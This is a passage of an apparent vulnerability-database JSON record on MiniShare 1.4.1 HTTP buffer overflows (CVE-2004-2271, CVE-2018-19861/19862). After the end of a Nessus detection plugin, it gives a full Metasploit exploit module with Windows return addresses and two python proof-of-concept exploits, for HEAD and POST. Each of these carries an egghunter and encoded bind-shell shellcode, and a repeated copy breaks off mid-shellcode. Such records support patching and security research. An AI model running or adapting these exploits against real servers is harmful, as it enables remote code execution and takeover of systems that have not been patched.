\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"MiniShare 1.4.1 and prior versions are affected by a buffer overflow \nflaw. A remote attacker could execute arbitrary commands by sending a\nspecially crafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2004/Nov/248\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MiniShare 1.4.2 or higher.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Minishare 1.4.1 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/11/07\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"MiniShare webserver buffer overflows\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2020 SensePost\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# Code Starts Here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\nif(get_port_state(port))\n{\nres = http_get_cache_ka(item:\"/\", port:port);\nif( res == NULL ) exit(0);\nif (\"<title>MiniShare</title>\" >!< res)\n exit (0);\n\nif (egrep (string:res, pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[0-1][^0-9])'))\n security_hole (port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-02T23:04:08", "description": "This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a \"jmp esp\" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Minishare 1.4.1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/MINISHARE_GET_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Minishare 1.4.1 Buffer Overflow',\n 'Description' => %q{\n This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n },\n 'Author' => [ 'acaro <acaro[at]jervus.it>' ],\n 'License' => BSD_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-2271'],\n [ 'OSVDB', '11530'],\n [ 'BID', '11620'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\",\n 'MinNops' => 64,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp\n ['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp\n ['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret\n ['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret\n ['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret\n ['Windows 2003 SP1 English', { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp\n ['Windows 2003 SP2 English', { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp\n ['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp\n ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\n ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp\n ['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\n ['Windows XP SP3 French', { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp\n ],\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 30\n },\n 'DisclosureDate' => 'Nov 7 2004'))\n end\n\n def exploit\n uri = rand_text_alphanumeric(target['Rets'][0])\n uri << [target['Rets'][1]].pack('V')\n uri << payload.encoded\n\n print_status(\"Trying target address 0x%.8x...\" % target['Rets'][1])\n send_request_raw({\n 'uri' => uri\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/minishare_get_overflow.rb"}], "zdt": [{"lastseen": "2018-12-12T05:53:18", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-12-08T00:00:00", "title": "MiniShare 1.4.1 HEAD / POST Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-08T00:00:00", "id": "1337DAY-ID-31748", "href": "https://0day.today/exploit/description/31748", "sourceData": "Hi!!! playing in 2006.... I have adapted the exploit to python\r\n\r\nNot only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST\r\nmethods are also vulnerable. The difference is minimal, both are exploited\r\nin the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length\r\n\r\n-------------------------------------------------------------------\r\n\r\nEAX 00000000\r\nECX 77C3EF3B msvcrt.77C3EF3B\r\nEDX 00F14E38\r\nEBX 43346843\r\nESP 01563908 ASCII\r\n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co\r\nHTTP/1.1\r\n\"\r\nEBP 0156BB90\r\nESI 00000001\r\nEDI 01565B68\r\nEIP 68433568\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 1 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDD000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty\r\nST1 empty\r\nST2 empty\r\nST3 empty\r\nST4 empty\r\nST5 empty\r\nST6 empty\r\nST7 empty\r\n 3 2 1 0 E S P U O Z D I\r\nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOnly 210 bytes to shellcode\r\n\r\n------------------------------------------------------------------------------\r\n\r\nBadchars '00','0d'\r\n\r\n------------------------------------------------------------------------------\r\n\r\n>findjmp kernel32.dll esp - XP SP 3 English\r\n\r\nScanning kernel32.dll for code useable with the esp register\r\n0x7C809F83 call esp\r\n0x7C8369E0 call esp\r\n0x7C83C2C5 push esp - ret\r\n0x7C87641B call esp\r\n\r\n\r\n<!--\r\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.\r\n# Date: 05-12-2018\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://minishare.sourceforge.net/\r\n# Software Link: http://minishare.sourceforge.net/\r\n# Version: Minishare v1.4.1\r\n# Tested on: Windows\r\n# CVE : CVE-2018-19861\r\n# Category: exploit\r\n\r\n1. Description\r\n\r\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP HEAD request.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nExploit:\r\n\r\n#!/usr/bin/env python\r\nimport socket\r\nimport struct\r\nimport os\r\n\r\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP HEAD request - by Rafa\r\n# CVE: CVE-2018-19861\r\n# Via Egghunter because shellcode in ESP only 210 bytes long.\r\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\r\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"127.0.0.1\"\r\nport = 80\r\n\r\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\r\negghunter =\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\r\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\r\n#Found 10 compatible encoders\r\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\r\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\r\n#x86/shikata_ga_nai chosen with final size 355\r\n#Payload size: 355 bytes\r\n#Final size of c file: 1516 bytes\r\n#unsigned char buf[] =\r\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\r\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\r\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\r\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\r\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\r\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\r\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\r\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\r\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\r\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\r\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\r\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\r\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\r\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\r\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\r\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\r\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\r\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\r\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\r\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\r\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\r\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\r\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\r\n\r\n# findjmp kernel32.dll esp - WinXP SP3 English\r\n#0x7C809F83 call esp\r\n\r\nnops = \"\\x90\" * 16\r\n\r\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\r\n1786 - 4 - 16 - len(egghunter))\r\n\r\ntry:\r\nprint \"Sending exploit...\"\r\nconnection.connect((host,port))\r\nbuffer = (\r\n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\"\r\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\r\n\r\nconnection.send(buffer)\r\nconnection.close()\r\nprint \"\\nExploit Sended \", len(buffer)\r\nexcept:\r\nprint \"Connection error\"\r\n\r\n\r\n\r\n3. Solution:\r\n\r\nThis product is deprecated\r\n\r\n-->\r\n\r\n\r\n<!--\r\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.\r\n# Date: 05-12-2018\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://minishare.sourceforge.net/\r\n# Software Link: http://minishare.sourceforge.net/\r\n# Version: Minishare v1.4.1\r\n# Tested on: Windows\r\n# CVE : CVE-2018-19862\r\n# Category: exploit\r\n\r\n1. Description\r\n\r\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP POST request.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nExploit:\r\n\r\n#!/usr/bin/env python\r\nimport socket\r\nimport struct\r\nimport os\r\n\r\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP POST request - by Rafa\r\n# CVE: CVE-2018-19862\r\n# Via Egghunter because shellcode in ESP only 210 bytes long.\r\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\r\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"127.0.0.1\"\r\nport = 80\r\n\r\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\r\negghunter =\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\r\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\r\n#Found 10 compatible encoders\r\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\r\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\r\n#x86/shikata_ga_nai chosen with final size 355\r\n#Payload size: 355 bytes\r\n#Final size of c file: 1516 bytes\r\n#unsigned char buf[] =\r\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\r\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\r\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\r\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\r\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\r\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\r\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\r\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\r\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\r\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\r\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\r\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\r\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\r\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\r\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\r\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\r\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\r\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\r\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\r\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\r\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\r\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\r\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\r\n\r\n# findjmp kernel32.dll esp - WinXP SP3 English\r\n#0x7C809F83 call esp\r\n\r\nnops = \"\\x90\" * 16\r\n\r\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\r\n1786 - 4 - 16 - len(egghunter))\r\n\r\ntry:\r\nprint \"Sending exploit...\"\r\nconnection.connect((host,port))\r\n\r\nbuffer = (\r\n\"POST \" + junk + \" HTTP/1.1\\r\\n\"\r\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\r\n\r\nconnection.send(buffer)\r\nconnection.close()\r\nprint \"\\nExploit Sended \", len(buffer)\r\nexcept:\r\nprint \"Connection error\"\r\n\r\n\r\n\r\n3. Solution:\r\n\r\nThis product is deprecated\r\n\r\n-->\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31748"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:34", "description": "\nMiniShare 1.4.1 - HEADPOST Remote Buffer Overflow", "edition": 1, "published": "2018-12-18T00:00:00", "title": "MiniShare 1.4.1 - HEADPOST Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-18T00:00:00", "id": "EXPLOITPACK:64B73DAC0A0638D9032B0D40ABD6337C", "href": "", "sourceData": "Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST\nmethods are also vulnerable. The difference is minimal, both are exploited\nin the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length\n\n-------------------------------------------------------------------\n\nEAX 00000000\nECX 77C3EF3B msvcrt.77C3EF3B\nEDX 00F14E38\nEBX 43346843\nESP 01563908 ASCII\n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co\nHTTP/1.1\n\"\nEBP 0156BB90\nESI 00000001\nEDI 01565B68\nEIP 68433568\nC 0 ES 0023 32bit 0(FFFFFFFF)\nP 1 CS 001B 32bit 0(FFFFFFFF)\nA 1 SS 0023 32bit 0(FFFFFFFF)\nZ 0 DS 0023 32bit 0(FFFFFFFF)\nS 0 FS 003B 32bit 7FFDD000(FFF)\nT 0 GS 0000 NULL\nD 0\nO 0 LastErr ERROR_SUCCESS (00000000)\nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)\nST0 empty\nST1 empty\nST2 empty\nST3 empty\nST4 empty\nST5 empty\nST6 empty\nST7 empty\n 3 2 1 0 E S P U O Z D I\nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\n\n------------------------------------------------------------------------------\n\nOnly 210 bytes to shellcode\n\n------------------------------------------------------------------------------\n\nBadchars '00','0d'\n\n------------------------------------------------------------------------------\n\n>findjmp kernel32.dll esp - XP SP 3 English\n\nScanning kernel32.dll for code useable with the esp register\n0x7C809F83 call esp\n0x7C8369E0 call esp\n0x7C83C2C5 push esp - ret\n0x7C87641B call esp\n\n\n<!--\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.\n# Date: 05-12-2018\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://minishare.sourceforge.net/\n# Software Link: http://minishare.sourceforge.net/\n# Version: Minishare v1.4.1\n# Tested on: Windows\n# CVE : CVE-2018-19861\n# Category: exploit\n\n1. Description\n\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP HEAD request.\n\n\n2. Proof of Concept\n\nExploit:\n\n#!/usr/bin/env python\nimport socket\nimport struct\nimport os\n\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP HEAD request - by Rafa\n# CVE: CVE-2018-19861\n# Via Egghunter because shellcode in ESP only 210 bytes long.\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"127.0.0.1\"\nport = 80\n\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\negghunter =\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\n#Found 10 compatible encoders\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\n#x86/shikata_ga_nai chosen with final size 355\n#Payload size: 355 bytes\n#Final size of c file: 1516 bytes\n#unsigned char buf[] =\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\n\"\\x96\\x6f\\xbc\\x7e